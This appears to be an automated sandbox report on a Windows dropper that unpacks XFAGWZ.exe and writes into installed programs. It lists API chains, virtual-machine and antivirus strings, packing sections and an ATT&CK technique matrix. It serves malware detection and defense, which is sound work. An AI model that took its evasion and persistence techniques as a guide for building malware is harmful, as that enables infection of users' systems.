    Source: XFAGWZ.exe.0.drStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
    Source: classification engineClassification label: mal100.spre.troj.evad.winEXE@5/12@1/1
    Source: C:\Users\user\AppData\Local\Temp\XFAGWZ.exeCode function: 1_2_006B119F GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,CloseHandle,1_2_006B119F
    Source: C:\Users\user\Desktop\8VB4lVuZk3.exeCode function: 0_2_6C8A6620 CoCreateInstance,OleRun,0_2_6C8A6620
    Source: C:\Users\user\Desktop\8VB4lVuZk3.exeFile created: C:\Users\user\Desktop\dataJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5356
    Source: C:\Users\user\Desktop\8VB4lVuZk3.exeFile created: C:\Users\user\AppData\Local\Temp\XFAGWZ.exeJump to behavior
    Source: C:\Users\user\Desktop\8VB4lVuZk3.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: 8VB4lVuZk3.exeString found in binary or memory: http://localhost/add_user
    Source: 8VB4lVuZk3.exeString found in binary or memory: /add_user
    Source: unknownProcess created: C:\Users\user\Desktop\8VB4lVuZk3.exe "C:\Users\user\Desktop\8VB4lVuZk3.exe"
    Source: C:\Users\user\Desktop\8VB4lVuZk3.exeProcess created: C:\Users\user\AppData\Local\Temp\XFAGWZ.exe C:\Users\user\AppData\Local\Temp\XFAGWZ.exe
    Source: C:\Users\user\AppData\Local\Temp\XFAGWZ.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5356 -s 1224
    Source: C:\Users\user\Desktop\8VB4lVuZk3.exeProcess created: C:\Users\user\AppData\Local\Temp\XFAGWZ.exe C:\Users\user\AppData\Local\Temp\XFAGWZ.exeJump to behavior
    Source: C:\Users\user\Desktop\8VB4lVuZk3.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\8VB4lVuZk3.exeSection loaded: winmm.dllJump to behavior
    Source: C:\Users\user\Desktop\8VB4lVuZk3.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\Desktop\8VB4lVuZk3.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Desktop\8VB4lVuZk3.exeSection loaded: dbghelp.dllJump to behavior
    Source: C:\Users\user\Desktop\8VB4lVuZk3.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\Desktop\8VB4lVuZk3.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\8VB4lVuZk3.exeSection loaded: quserex.dllJump to behavior
    Source: C:\Users\user\Desktop\8VB4lVuZk3.exeSection loaded: textshaping.dllJump to behavior
    Source: C:\Users\user\Desktop\8VB4lVuZk3.exeSection loaded: textinputframework.dllJump to behavior
    Source: C:\Users\user\Desktop\8VB4lVuZk3.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Users\user\Desktop\8VB4lVuZk3.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Users\user\Desktop\8VB4lVuZk3.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Users\user\Desktop\8VB4lVuZk3.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Users\user\Desktop\8VB4lVuZk3.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\8VB4lVuZk3.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\8VB4lVuZk3.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\XFAGWZ.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\XFAGWZ.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\XFAGWZ.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\XFAGWZ.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\XFAGWZ.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\XFAGWZ.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\XFAGWZ.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\XFAGWZ.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\XFAGWZ.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\XFAGWZ.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\XFAGWZ.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\XFAGWZ.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\XFAGWZ.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\XFAGWZ.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\XFAGWZ.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\XFAGWZ.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\XFAGWZ.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\XFAGWZ.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\XFAGWZ.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\XFAGWZ.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\XFAGWZ.exeSection loaded: ntvdm64.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\XFAGWZ.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\XFAGWZ.exeSection loaded: textshaping.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\XFAGWZ.exeSection loaded: textinputframework.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\XFAGWZ.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\XFAGWZ.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\XFAGWZ.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\XFAGWZ.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\XFAGWZ.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\XFAGWZ.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\XFAGWZ.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\XFAGWZ.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: 8VB4lVuZk3.exeStatic file information: File size 4354058 > 1048576
    Source: 8VB4lVuZk3.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x2e3000
    Source: Binary string: C:\Program Files (x86)\e\lib\e2ee.pdb source: 8VB4lVuZk3.exe, 00000000.00000003.1692440298.0000000003147000.00000004.00000020.00020000.00000000.sdmp, 8VB4lVuZk3.exe, 00000000.00000002.2943702385.000000006CD00000.00000002.00000001.01000000.00000007.sdmp, E2EECore.2.7.2.dll.0.dr
    Source: Binary string: -C:\Program Files (x86)\e\lib\e2ee.pdbxw source: 8VB4lVuZk3.exe, 00000000.00000003.1692440298.0000000003147000.00000004.00000020.00020000.00000000.sdmp, 8VB4lVuZk3.exe, 00000000.00000002.2943702385.000000006CD00000.00000002.00000001.01000000.00000007.sdmp, E2EECore.2.7.2.dll.0.dr
    Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.1.dr

    Data Obfuscation

    barindex
    Source: C:\Users\user\AppData\Local\Temp\XFAGWZ.exeUnpacked PE file: 1.2.XFAGWZ.exe.6b0000.0.unpack .text:EW;.rdata:W;.data:W;.reloc:W;.aspack:EW;.adata:EW; vs .text:ER;.rdata:R;.data:W;.reloc:R;.aspack:EW;.adata:EW;
    Source: initial sampleStatic PE information: section where entry point is pointing to: ub
    Source: 8VB4lVuZk3.exeStatic PE information: section name: ub
    Source: XFAGWZ.exe.0.drStatic PE information: section name: .aspack
    Source: XFAGWZ.exe.0.drStatic PE information: section name: .adata
    Source: Uninstall.exe.1.drStatic PE information: section name: EpNuZ
    Source: MyProg.exe.1.drStatic PE information: section name: PELIB
    Source: MyProg.exe.1.drStatic PE information: section name: Y|uR
    Source: SciTE.exe.1.drStatic PE information: section name: u
    Source: C:\Users\user\Desktop\8VB4lVuZk3.exeCode function: 0_2_6CC22E1A push ecx; ret 0_2_6CC22E2D
    Source: C:\Users\user\Desktop\8VB4lVuZk3.exeCode function: 0_2_6CC139E5 push ecx; ret 0_2_6CC139F8
    Source: C:\Users\user\AppData\Local\Temp\XFAGWZ.exeCode function: 1_2_006B1638 push dword ptr [006B3084h]; ret 1_2_006B170E
    Source: C:\Users\user\AppData\Local\Temp\XFAGWZ.exeCode function: 1_2_006B600A push ebp; ret 1_2_006B600D
    Source: C:\Users\user\AppData\Local\Temp\XFAGWZ.exeCode function: 1_2_006B2D9B push ecx; ret 1_2_006B2DAB
    Source: C:\Users\user\AppData\Local\Temp\XFAGWZ.exeCode function: 1_2_006B6014 push 006B14E1h; ret 1_2_006B6425
    Source: XFAGWZ.exe.0.drStatic PE information: section name: .text entropy: 7.81169422100848
    Source: Uninstall.exe.1.drStatic PE information: section name: EpNuZ entropy: 6.933808104992655
    Source: MyProg.exe.1.drStatic PE information: section name: Y|uR entropy: 6.934924014802639
    Source: SciTE.exe.1.drStatic PE information: section name: u entropy: 6.934667922978697

    Persistence and Installation Behavior

    barindex
    Source: C:\Users\user\AppData\Local\Temp\XFAGWZ.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\XFAGWZ.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\XFAGWZ.exeSystem file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\XFAGWZ.exeFile created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\XFAGWZ.exeFile created: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
    Source: C:\Users\user\Desktop\8VB4lVuZk3.exeFile created: C:\Users\user\AppData\Local\Temp\XFAGWZ.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\XFAGWZ.exeFile created: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to dropped file
    Source: C:\Users\user\Desktop\8VB4lVuZk3.exeFile created: C:\Users\user\AppData\Local\Temp\E2EECore.2.7.2.dllJump to dropped file

    Hooking and other Techniques for Hiding and Protection

    barindex
    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 799
    Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 799
    Source: C:\Users\user\Desktop\8VB4lVuZk3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\XFAGWZ.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\XFAGWZ.exeDropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\XFAGWZ.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to dropped file
    Source: C:\Users\user\Desktop\8VB4lVuZk3.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E2EECore.2.7.2.dllJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\XFAGWZ.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_1-1063
    Source: C:\Users\user\Desktop\8VB4lVuZk3.exeAPI coverage: 3.0 %
    Source: C:\Users\user\AppData\Local\Temp\XFAGWZ.exeCode function: 1_2_006B1718 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [ebp+08h], 02h and CTI: jne 006B1754h1_2_006B1718
    Source: C:\Users\user\AppData\Local\Temp\XFAGWZ.exeCode function: 1_2_006B29E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,1_2_006B29E2
    Source: C:\Users\user\AppData\Local\Temp\XFAGWZ.exeCode function: 1_2_006B2B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,1_2_006B2B8C
    Source: C:\Users\user\AppData\Local\Temp\XFAGWZ.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\XFAGWZ.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\XFAGWZ.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\XFAGWZ.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\XFAGWZ.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\XFAGWZ.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\Jump to behavior
    Source: Amcache.hve.1.drBinary or memory string: VMware
    Source: Amcache.hve.1.drBinary or memory string: VMware Virtual USB Mouse
    Source: Amcache.hve.1.drBinary or memory string: vmci.syshbin
    Source: Amcache.hve.1.drBinary or memory string: VMware, Inc.
    Source: Amcache.hve.1.drBinary or memory string: VMware20,1hbin@
    Source: Amcache.hve.1.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
    Source: Amcache.hve.1.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
    Source: Amcache.hve.1.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
    Source: XFAGWZ.exe, 00000001.00000003.1695679866.00000000011FE000.00000004.00000020.00020000.00000000.sdmp, XFAGWZ.exe, 00000001.00000003.1696071280.00000000011B5000.00000004.00000020.00020000.00000000.sdmp, XFAGWZ.exe, 00000001.00000002.1892621904.0000000001190000.00000004.00000020.00020000.00000000.sdmp, XFAGWZ.exe, 00000001.00000002.1892621904.00000000011E9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: Amcache.hve.1.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
    Source: Amcache.hve.1.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
    Source: Amcache.hve.1.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
    Source: Amcache.hve.1.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
    Source: 8VB4lVuZk3.exe, 00000000.00000002.2942753099.0000000000917000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
    Source: Amcache.hve.1.drBinary or memory string: vmci.sys
    Source: Amcache.hve.1.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
    Source: Amcache.hve.1.drBinary or memory string: vmci.syshbin`
    Source: Amcache.hve.1.drBinary or memory string: \driver\vmci,\driver\pci
    Source: Amcache.hve.1.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
    Source: Amcache.hve.1.drBinary or memory string: VMware20,1
    Source: Amcache.hve.1.drBinary or memory string: Microsoft Hyper-V Generation Counter
    Source: Amcache.hve.1.drBinary or memory string: NECVMWar VMware SATA CD00
    Source: Amcache.hve.1.drBinary or memory string: VMware Virtual disk SCSI Disk Device
    Source: Amcache.hve.1.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
    Source: Amcache.hve.1.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
    Source: Amcache.hve.1.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
    Source: Amcache.hve.1.drBinary or memory string: VMware PCI VMCI Bus Device
    Source: Amcache.hve.1.drBinary or memory string: VMware VMCI Bus Device
    Source: Amcache.hve.1.drBinary or memory string: VMware Virtual RAM
    Source: Amcache.hve.1.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
    Source: Amcache.hve.1.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
    Source: C:\Users\user\AppData\Local\Temp\XFAGWZ.exeAPI call chain: ExitProcess graph end nodegraph_1-1038
    Source: C:\Users\user\Desktop\8VB4lVuZk3.exeCode function: 0_2_00856044 mov eax, dword ptr fs:[00000030h]0_2_00856044
    Source: C:\Users\user\Desktop\8VB4lVuZk3.exeCode function: 0_2_6CA35DF0 _free,_free,GetProcessHeap,HeapFree,0_2_6CA35DF0
    Source: C:\Users\user\Desktop\8VB4lVuZk3.exeCode function: 0_2_6CC131F5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6CC131F5
    Source: SciTE.exe.1.drBinary or memory string: Ctrl+RightLeftDownUpDecimalMinusMultiplyDivideTabSpaceDeleteEscapeEndInsertEnterHomeForwardBackwardPLAT_WIN1PageDownPageUpMenuWinSciTEACCELSSciTEWindowContentSciTEWindowPLAT_WINNT1toolbar.largecreate.hidden.consolegbkbig5euc-krshift_jisutf-8asciilatin2latin1translation.encodingwindows-1251ScaleFactoriso-8859-5cyrillic1250iso8859-11SciTE_HOMEAppsUseLightThemeSciTE_USERHOMESciTE_HOMEPropertiesScaleFactorSoftware\Microsoft\Windows\CurrentVersion\Themes\PersonalizeEmbeddedRich Text FormatButtonShell_TrayWndUSERPROFILESciTE_HOMEHtmlHelpWHHCTRL.OCX
    Source: C:\Users\user\Desktop\8VB4lVuZk3.exeCode function: 0_2_6CC04D55 GetSystemTimeAsFileTime,__aulldiv,0_2_6CC04D55
    Source: C:\Users\user\Desktop\8VB4lVuZk3.exeCode function: 0_2_6C806E10 e2ee_httprequestGetVersion,0_2_6C806E10
    Source: Amcache.hve.1.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
    Source: Amcache.hve.1.drBinary or memory string: msmpeng.exe
    Source: Amcache.hve.1.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
    Source: Amcache.hve.1.drBinary or memory string: MsMpEng.exe

    Stealing of Sensitive Information

    barindex
    Source: Yara matchFile source: Process Memory Space: XFAGWZ.exe PID: 5356, type: MEMORYSTR

    Remote Access Functionality

    barindex
    Source: Yara matchFile source: Process Memory Space: XFAGWZ.exe PID: 5356, type: MEMORYSTR
    Source: C:\Users\user\Desktop\8VB4lVuZk3.exeCode function: 0_2_6C80DFD0 e2ee_httpserver_Bindable_BindDatabasePool,0_2_6C80DFD0
    Source: C:\Users\user\Desktop\8VB4lVuZk3.exeCode function: 0_2_6C983860 e2ee_jstdataBindFile,0_2_6C983860
    Source: C:\Users\user\Desktop\8VB4lVuZk3.exeCode function: 0_2_6C8AABA0 e2ee_amqpcBindQueue,0_2_6C8AABA0
    Source: C:\Users\user\Desktop\8VB4lVuZk3.exeCode function: 0_2_6C8096A0 e2ee_CreateFunctionLabel_BindObject,0_2_6C8096A0
    Source: C:\Users\user\Desktop\8VB4lVuZk3.exeCode function: 0_2_6C80E010 e2ee_httpserver_Bindable_BindObjectMapping,0_2_6C80E010
    Source: C:\Users\user\Desktop\8VB4lVuZk3.exeCode function: 0_2_6C80E050 e2ee_httpserver_Bindable_BindCacheProxy,0_2_6C80E050
    Source: C:\Users\user\Desktop\8VB4lVuZk3.exeCode function: 0_2_6C8A4370 e2ee_adopool_BindCacheProxy,0_2_6C8A4370
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
    Command and Scripting Interpreter
    1
    DLL Side-Loading
    1
    Access Token Manipulation
    1
    Masquerading
    11
    Input Capture
    11
    System Time Discovery
    1
    Taint Shared Content
    11
    Input Capture
    2
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault Accounts1
    Native API
    Boot or Logon Initialization Scripts2
    Process Injection
    1
    Access Token Manipulation
    LSASS Memory21
    Security Software Discovery
    Remote Desktop Protocol11
    Archive Collected Data
    11
    Non-Standard Port
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
    DLL Side-Loading
    2
    Process Injection
    Security Account Manager1
    Process Discovery
    SMB/Windows Admin SharesData from Network Shared Drive2
    Ingress Tool Transfer
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
    Deobfuscate/Decode Files or Information
    NTDS3
    File and Directory Discovery
    Distributed Component Object ModelInput Capture2
    Non-Application Layer Protocol
    Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
    Obfuscated Files or Information
    LSA Secrets3
    System Information Discovery
    SSHKeylogging12
    Application Layer Protocol
    Scheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts12
    Software Packing
    Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
    DLL Side-Loading
    DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


